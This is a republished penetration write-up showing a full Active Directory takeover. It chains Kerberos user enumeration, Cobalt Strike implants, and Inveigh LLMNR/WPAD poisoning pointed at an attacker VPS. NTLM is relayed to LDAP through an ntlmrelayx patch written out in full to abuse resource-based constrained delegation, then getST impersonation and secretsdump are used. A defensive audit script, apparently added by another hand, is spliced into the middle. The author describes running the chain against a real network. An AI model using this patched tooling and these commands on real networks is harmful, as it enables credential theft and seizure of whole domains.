
How to use relay and delegation

2025-01-19 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/03 Report--

This article mainly introduces "how to use relay and delegation". Many people have questions about how to use relay and delegation in daily work, so the editor consulted various sources and put together a simple, practical walkthrough. I hope it helps answer those questions. Please follow along!

0x01 Background

After dialing into the intranet through the VPN, the routing table and earlier scanning showed two active segments in the target intranet: 10.10.1.0/24 and 10.10.2.0/24. 10.10.1.88 is the domain controller.

0x02

Based on the earlier information gathering, no host in the active segments could be exploited directly, so we sorted through the information already in hand. The hostnames of the machines in the target intranet all follow the pattern ATTACK-TONY-PC, and we guessed that the string in the middle is the user name. We verified this guess using the behaviour of Kerberos pre-authentication, collected all hostnames together with the VPN passwords, and successfully enumerated one set of valid credentials. For the tools used, see Penetration Tips: user enumeration and password brute-forcing via Kerberos pre-auth.

0x03

From past experience, in a domain where the user name is part of the hostname, the domain user has most likely been added to the local administrators group of that machine. So we find the machine that corresponds to the user and try wmic directly.

```
wmic /node:10.10.1.96 /user:ATTACK\TONY /password:1qaz2wsx os get name
```

Sure enough, the operating system information came back correctly. Next we list the processes on the machine through wmic:

```
wmic /node:10.10.1.96 /user:ATTACK\TONY /password:1qaz2wsx process get name
```

After adapting the payload to the protection software on the machine (AV evasion), we dropped the binary and brought the host online in Cobalt Strike. At this point we have a foothold in the domain. Unfortunately, the owner of this machine seems to be a peripheral user, and nothing on it helps us move further; the built-in RID 500 administrator account on this machine has an empty password. Looking at LDAP, almost all machines in the domain run Windows 10, with a few Server 2016. We are currently on 10.10.1.96, and the domain administrator's machine is 10.10.2.66. One piece of LDAP information caught our attention: for most machines, mS-DS-CreatorSID is the SID of the corresponding user, and for a small number of machines it is the SID of one and the same user (the network administrator). In other words, the machines were mostly joined to the domain by their own users, so each domain user holds WriteProperty on the computer account they joined and can manipulate its msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If we obtain that user's privileges, the two conditions for abusing resource-based constrained delegation are met:

- The msDS-AllowedToActOnBehalfOfOtherIdentity attribute can be modified.
- A machine account is available (this is not quite precise: it should be an account with an SPN, or more precisely still, a TGT for some account is required; a machine account satisfies this).

For the machine account we can use ATTACK-TONY-PC$, which we already obtained. So where do we get the user's privileges?

0x04 WPAD + NTLM Relay + Resource-based constrained delegation

Before we begin, a brief explanation of the concepts involved. (Only a short overview is given here; to fully understand them you will need to study each topic yourself.)

WPAD

WPAD (Web Proxy Auto-Discovery Protocol) lets browsers on a local network automatically discover a proxy server and use it to reach the Internet or the intranet. When proxy auto-discovery is enabled and the user browses the web, the browser looks for a proxy server on the current local network. If one is found, it downloads a configuration file called a PAC (Proxy Auto-Config) file from it; that file defines which proxy to use for each URL. The browser parses the file and applies the corresponding proxy settings. During the WPAD request, if the server answers with a 401 and demands authentication, some browsers and applications will automatically authenticate with the current user's credentials.

LLMNR,NBT-NS

LLMNR and NBT-NS are both name-resolution protocols. Windows name resolution proceeds roughly in the order DNS -> LLMNR -> NetBIOS: if a name cannot be resolved through DNS, Windows broadcasts an LLMNR or NetBIOS query on the current subnet. If we are on the same subnet as the target machine, we can answer that broadcast and spoof the resolution.

NTLM Relay

Resource-based constrained delegation

Resource-based constrained delegation was introduced in Windows Server 2012. It lets a resource itself configure which accounts are trusted to delegate to it, so control over delegation moves to the administrator who owns the resource being accessed.

Domain penetration: abusing resource-based constrained delegation

With the above in mind, the attack proceeds as follows: poison the current network segment, use WPAD spoofing to make the user authenticate to us with NTLM, and relay that authentication to LDAP. Because the user can modify the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of the machine they joined to the domain, we set that attribute to configure resource-based constrained delegation and thereby obtain control of the host.
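The observation the chain above depends on (a computer object's mS-DS-CreatorSID names the unprivileged user who joined it, and that user can write msDS-AllowedToActOnBehalfOfOtherIdentity) is also exactly what a defender should audit. The following is an added example, not code from the original article or from impacket: it parses the raw security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity (the same SR_SECURITY_DESCRIPTOR / ACCESS_ALLOWED_ACE layout the patched ntlmrelayx code manipulates) and flags computers whose creator is not a trusted account yet already carry a delegation grant. The computer entries, SIDs and descriptor bytes are constructed test data.

```python
import struct

# Constructed sample: a self-relative security descriptor whose DACL holds one
# ACCESS_ALLOWED_ACE for S-1-5-21-1-2-3-1105 (the shape impacket's
# create_empty_sd()/create_allow_ace() produce; all values are made up here).
SAMPLE_RBCD_SD = bytes.fromhex(
    "0100" "0480" "00000000" "00000000" "00000000" "14000000"  # header, DACL at offset 20
    "0400" "2c00" "0100" "0000"                                # ACL: rev 4, 44 bytes, 1 ACE
    "0000" "2400" "ff010f00"                                   # ACE type 0, 36 bytes, mask 0xF01FF
    "0105" "000000000005" "15000000" "01000000" "02000000" "03000000" "51040000"  # SID
)

def parse_sid(buf, off):
    """Decode a binary SID at buf[off:] into S-1-5-... form."""
    rev, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (rev, authority, "-".join(str(s) for s in subs))

def allowed_sids(sd):
    """Return the SIDs granted by ACCESS_ALLOWED_ACEs in the DACL of a self-relative SD."""
    control = struct.unpack_from("<H", sd, 2)[0]
    dacl_off = struct.unpack_from("<I", sd, 16)[0]
    if not control & 0x0004 or dacl_off == 0:  # SE_DACL_PRESENT not set: nothing granted
        return []
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    pos, sids = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, ace_size = sd[pos], struct.unpack_from("<H", sd, pos + 2)[0]
        if ace_type == 0x00:  # ACCESS_ALLOWED_ACE_TYPE; the SID follows the 4-byte mask
            sids.append(parse_sid(sd, pos + 8))
        pos += ace_size
    return sids

def audit_rbcd(computers, trusted_creators):
    """Flag computers joined by an untrusted account that now carry an RBCD grant.
    computers: dicts with 'dn', 'creator_sid' (mS-DS-CreatorSID) and 'rbcd' (raw attribute bytes or None)."""
    findings = []
    for c in computers:
        grants = allowed_sids(c["rbcd"]) if c["rbcd"] else []
        if grants and c["creator_sid"] not in trusted_creators:
            findings.append((c["dn"], c["creator_sid"], grants))
    return findings

# Constructed directory snapshot mirroring the article's lab: WIN10-1 and WIN10-2 were
# joined by the ordinary user TEST (RID 1106), WIN10 by Administrator (RID 500).
TRUSTED_CREATORS = {"S-1-5-21-1-2-3-500"}
SAMPLE_COMPUTERS = [
    {"dn": "CN=WIN10,CN=Computers,DC=attack,DC=com", "creator_sid": "S-1-5-21-1-2-3-500", "rbcd": SAMPLE_RBCD_SD},
    {"dn": "CN=WIN10-1,CN=Computers,DC=attack,DC=com", "creator_sid": "S-1-5-21-1-2-3-1106", "rbcd": SAMPLE_RBCD_SD},
    {"dn": "CN=WIN10-2,CN=Computers,DC=attack,DC=com", "creator_sid": "S-1-5-21-1-2-3-1106", "rbcd": None},
]
```

Against a real directory, feed `audit_rbcd` the `mS-DS-CreatorSID` and raw `msDS-AllowedToActOnBehalfOfOtherIdentity` values of every computer object and treat any finding as a candidate for the relay chain described above.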

0x05 Modifying impacket

ntlmrelayx currently only supports modifying resource-based constrained delegation when the relayed account is a machine account, so it needs a few small changes for our attack flow. To make debugging easier for interested readers, the modification process is given here; skip it if you are not interested. A modified, packaged impacket is provided at the end of the article.

impacket/examples/ntlmrelayx.py

Add options.user_delegate_access to the setLDAPOptions call:

```python
c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs,
                 options.escalate_user, options.add_computer, options.delegate_access,
                 options.dump_laps, options.dump_gmsa, options.sid, options.user_delegate_access)
```

Add the argument where the LDAP options are defined:

```python
ldapoptions.add_argument('--user-delegate-access', action='store_true', required=False,
                         help='Delegate access on relayed user account to the specified account')
```

impacket/impacket/examples/ntlmrelayx/utils/config.py

Modify the setLDAPOptions method and add userdelegateaccess:

```python
def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer,
                   delegateaccess, dumplaps, dumpgmsa, sid, userdelegateaccess):
    self.dumpdomain = dumpdomain
    self.addda = addda
    self.aclattack = aclattack
    self.validateprivs = validateprivs
    self.escalateuser = escalateuser
    self.addcomputer = addcomputer
    self.delegateaccess = delegateaccess
    self.dumplaps = dumplaps
    self.dumpgmsa = dumpgmsa
    self.sid = sid
    self.userdelegateaccess = userdelegateaccess
```

impacket/impacket/examples/ntlmrelayx/attacks/ldapattack.py

Add a module-level global variable `delegatePerformedUser = []`, then add the following methods to class LDAPAttack(ProtocolAttack):

```python
delegatePerformedUser = []  # users for which the delegation attack has already been run


def MFdelegateAttack(self, usersam, targetsam, domainDumper, sid, ssid):
    global delegatePerformedUser
    if not usersam:
        # no account to escalate was given: create a new computer account and use it
        usersam = self.addComputer('CN=Computers,%s' % domainDumper.root, domainDumper)
        self.config.escalateuser = usersam
    if not sid:
        # Get escalate user sid
        result = self.getUserInfo(domainDumper, usersam)
        if not result:
            LOG.error('User to escalate does not exist')
            return
        escalate_sid = str(result[1])  # sid
    else:
        escalate_sid = usersam
    # getCreatorSID is assumed to be defined elsewhere in the author's patched ldapattack.py
    # (not shown in the article): it returns (dn, sid) pairs of computers whose
    # mS-DS-CreatorSID equals ssid, or False when none is found
    attackList = self.getCreatorSID(domainDumper, ssid)
    # LOG.debug(attackList)
    # LOG.debug(escalate_sid)
    if attackList is False:
        LOG.info('Cannot find a computer with mS-DS-CreatorSID %s' % ssid)
        return
    LOG.info("Try to modify delegation rights")
    for attack in attackList:
        self.addDelegation(attack[0], escalate_sid)
    delegatePerformedUser.append(targetsam)


def addDelegation(self, target_dn, escalate_sid):
    self.client.search(target_dn, '(objectClass=*)', search_scope=ldap3.BASE,
                       attributes=['SAMAccountName', 'objectSid',
                                   'msDS-AllowedToActOnBehalfOfOtherIdentity', 'name'])
    targetuser = None
    for entry in self.client.response:
        if entry['type'] != 'searchResEntry':
            continue
        targetuser = entry
    if not targetuser:
        LOG.error('Could not query target user properties')
        return False
    try:
        # reuse the existing security descriptor if the attribute is already set
        sd = ldaptypes.SR_SECURITY_DESCRIPTOR(
            data=targetuser['raw_attributes']['msDS-AllowedToActOnBehalfOfOtherIdentity'][0])
        LOG.debug('Currently allowed sids:')
        for ace in sd['Dacl'].aces:
            LOG.debug('    %s' % ace['Ace']['Sid'].formatCanonical())
    except IndexError:
        sd = create_empty_sd()
    sd['Dacl'].aces.append(create_allow_ace(escalate_sid))
    self.client.modify(targetuser['dn'],
                       {'msDS-AllowedToActOnBehalfOfOtherIdentity': [ldap3.MODIFY_REPLACE, [sd.getData()]]})
    if self.client.result['result'] == 0:
        LOG.info('Delegation rights modified successfully!')
        LOG.info('%s can now impersonate users on %s via S4U2Proxy',
                 self.config.escalateuser, targetuser['attributes']['name'])
        return True
    else:
        if self.client.result['result'] == 50:
            LOG.error('Could not modify object, the server reports insufficient rights: %s',
                      self.client.result['message'])
        elif self.client.result['result'] == 19:
            LOG.error('Could not modify object, the server reports a constrained violation: %s',
                      self.client.result['message'])
        else:
            LOG.error('The server returned an error: %s', self.client.result['message'])
        return False


def userdelegateAttack(self, usersam, targetsam, domainDumper, sid):
    global delegatePerformedUser
    if targetsam in delegatePerformedUser:
        LOG.info('Delegate attack already performed for this User: %s, skipping' % targetsam)
        return
    # look up the relayed user's SID, then find the computers that user created
    self.client.search(domainDumper.root, '(sAMAccountName=%s)' % escape_filter_chars(targetsam),
                       attributes=['objectSid', 'primaryGroupId'])
    user = self.client.entries[0]
    usersid = user['objectSid'].value
    tmp_flag = self.getCreatorSID(domainDumper, usersid)
    LOG.info('Try to find the computer with mS-DS-CreatorSID %s' % usersid)
    if tmp_flag is not False:
        for x in tmp_flag:
            LOG.info('DN: %s  SID: %s' % (x[0], x[1]))
        self.MFdelegateAttack(usersam, targetsam, domainDumper, sid, usersid)
```

Add the following code to the run method:

```python
if self.config.userdelegateaccess:
    self.userdelegateAttack(self.config.escalateuser, self.username, domainDumper, self.config.sid)
    return
```

Reinstall impacket:

```shell
pip3 uninstall impacket; pip3 install .
```

Usage:

```shell
sudo python3 ./examples/ntlmrelayx.py -t ldap://192.168.1.63 --escalate-user=WIN10\$ --user-delegate-access

sudo python3 ./examples/ntlmrelayx.py -t ldaps://192.168.1.63 --user-delegate-access
```

0x06 Completing the attack chain

To avoid unnecessary accidents, the local test environment is used from here on instead of the real target:

| Name | Note |
| --- | --- |
| Administrator | domain administrator |
| rabbit | ordinary domain user |
| test | ordinary domain user |

| Name | OS | IP | Note |
| --- | --- | --- | --- |
| DC | Server 2016 | 192.168.1.63 | domain controller |
| WIN10 | Windows 10 | 192.168.1.59 | personal PC; simulates the machine we compromised in the domain |
| WIN10-1 | Windows 10 | 192.168.1.78 | personal PC; joined to the domain by user ATTACK\TEST, logged-in user ATTACK\TEST |
| WIN10-2 | Windows 10 | 192.168.1.77 | personal PC; joined to the domain by user ATTACK\TEST, logged-in user ATTACK\TEST |
| kali | Kali | 192.168.1.79 | simulates the public-network VPS |

First, we start Inveigh on the WIN10 machine to spoof LLMNR/NBNS. Only the poisoning function is needed here, so the C# version of Inveigh suffices, and it can be run through Cobalt Strike's execute-assembly to evade AV. The spoofed address points to the public-network VPS, which in this environment is the kali host.

```
execute-assembly c:\windows\rabbit\tools\Inveigh.exe -SpooferIP 192.168.1.79
```

On kali, start ntlmrelayx.py listening with the parameters for the attack:

```shell
sudo python3 ./examples/ntlmrelayx.py -t ldap://192.168.1.63 --escalate-user=WIN10\$ --user-delegate-access -debug
```

Taking Chrome as an example: when user ATTACK\TEST opens Chrome, the WPAD request triggers our attack chain and we take over the machine.


As you can see, we successfully configured resource-based constrained delegation from WIN10$ to WIN10-1 and WIN10-2. We can now request service tickets impersonating a privileged user to access the corresponding services:

```shell
python3 getST.py -dc-ip 192.168.1.63 ATTACK/WIN10\$ -hashes aad3b435b51404eeaad3b435b51404ee:0c5082ca74c579d34d4de279a84ee44f -spn host/WIN10-2.attack.com -impersonate administrator
```

Inject the ticket into the current context and try to access the machine; as shown in the figure, we successfully obtain access to WIN10-2.

For more on which services require which tickets, see How Attackers Use Kerberos Silver Tickets to Exploit Systems:

| Service Type | Service Silver Tickets |
| --- | --- |
| WMI | HOST, RPCSS |
| PowerShell Remoting | HOST, HTTP (WSMAN, RPCSS) |
| WinRM | HOST, HTTP |
| Scheduled Tasks | HOST |
| Windows File Share (CIFS) | CIFS |
| LDAP operations including Mimikatz DCSync | LDAP |
| Windows Remote Server Administration Tools | RPCSS, LDAP, CIFS |

For example:

That is the whole attack chain. Back in the real engagement, by running the chain above in a targeted way (Inveigh's SpooferIPsReply parameter restricts spoofing to specific IPs), I obtained several developers' machines, and from one of them gained a machine on the 10.10.2.0/24 segment, which put us on the same network segment as the domain administrator. From there we can relay the domain administrator's credentials to LDAP and grant privileges to any user we choose: point Inveigh's SpooferIPsReply at the domain administrator's IP, start ntlmrelayx listening, target LDAP, and specify the user.

```
execute-assembly c:\windows\rabbit\tools\Inveigh.exe -SpooferIPsReply 10.10.2.66 -SpooferIP VPS-IP
```

```shell
proxychains python3 ./examples/ntlmrelayx.py -t ldap://192.168.98.10 --escalate-user=rabbit
```

Two minutes later, the domain administrator's machine requested our WPAD; the authentication was relayed to LDAP and the specified user was granted the privileges. (The screenshot of the process is again taken from the test environment.)

Next, secretsdump.py dumps the domain administrator's hash, which gives us the domain controller. At this point we hold the entire domain.

This concludes the study of "how to use relay and delegation". I hope it has answered your questions. Combining theory with practice is the best way to learn, so go and try it! If you want to keep learning, please continue to follow the website; the editor will keep working to bring you more practical articles!

Welcome to subscribe to "Shulou Technology Information" for the latest news, interesting stories and hot topics in the IT industry, and to keep up with the hottest and latest Internet news, technology news and IT industry trends.
